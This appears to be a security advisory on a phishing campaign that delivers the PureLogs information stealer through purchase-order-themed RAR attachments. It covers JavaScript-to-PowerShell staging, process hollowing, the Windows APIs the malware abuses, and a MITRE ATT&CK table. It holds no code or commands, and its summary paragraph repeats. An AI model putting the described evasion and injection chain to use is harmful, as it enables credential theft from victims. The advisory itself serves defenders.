EXECUTIVE SUMMARY:
A phishing campaign has been identified targeting Windows users through deceptive purchase-order-themed emails containing malicious RAR attachments. The campaign relies on social engineering techniques to convince recipients to open embedded JavaScript files that initiate a multi-stage infection chain. Once executed, the attack deploys a variant of the PureLogs information stealer designed to harvest sensitive information, including credentials, browser data, and other confidential system details. The operation demonstrates how threat actors continue to abuse trusted scripting technologies and fileless execution methods to bypass conventional security controls and increase infection success rates.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY:
A phishing campaign has been identified targeting Windows users through deceptive purchase-order-themed emails containing malicious RAR attachments. The campaign relies on social engineering techniques to convince recipients to open embedded JavaScript files that initiate a multi-stage infection chain. Once executed, the attack deploys a variant of the PureLogs information stealer designed to harvest sensitive information, including credentials, browser data, and other confidential system details. The operation demonstrates how threat actors continue to abuse trusted scripting technologies and fileless execution methods to bypass conventional security controls and increase infection success rates.[emaillocker id="1283"]
The infection process begins with the malicious JavaScript decrypting embedded PowerShell commands and dropping temporary script files onto the system before executing them in hidden mode. The PowerShell payload performs fileless execution and leverages process hollowing techniques to inject malicious .NET modules into legitimate Windows components during runtime. The malware abuses Windows APIs including CreateProcessA, WriteProcessMemory, VirtualAllocEx, and ResumeThread to conceal its execution and evade traditional detection mechanisms. Once active, the downloader component communicates with remote command-and-control infrastructure to retrieve additional PureLogs plugins capable of credential theft, browser data collection, and payload delivery. The campaign also incorporates layered obfuscation, Base64 encoding, encrypted payloads, and in-memory execution techniques to complicate forensic analysis and defensive monitoring efforts.
It demonstrates the growing of phishing operations that combine social engineering with advanced malware delivery and defense-evasion techniques. The use of obfuscated JavaScript, fileless PowerShell execution, and process hollowing significantly increases the risk to enterprise and individual environments by reducing forensic visibility and bypassing conventional security controls. Organizations should strengthen email filtering, restrict script-based execution, monitor abnormal PowerShell activity, and deploy advanced endpoint detection mechanisms to identify suspicious in-memory behaviors associated with PureLogs and similar information-stealing threats.
THREAT PROFILE:
| Tactic | Technique Id | Technique | Sub-technique |
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| Execution | T1059.007 | Command and Scripting Interpreter | JavaScript |
| T1059.001 | PowerShell | ||
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder |
| Stealth | T1027.010 | Obfuscated Files or Information | Command Obfuscation |
| T1218.011 | System Binary Proxy Execution | Rundll32 | |
| T1055.012 | Process Injection | Process Hollowing | |
| Credential Access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| Discovery | T1082 | System Information Discovery | - |
| Collection | T1005 | Data from Local System | - |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| T1105 | Ingress Tool Transfer | - | |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | - |
REFERENCES:
The following reports contain further technical details:
[/emaillocker]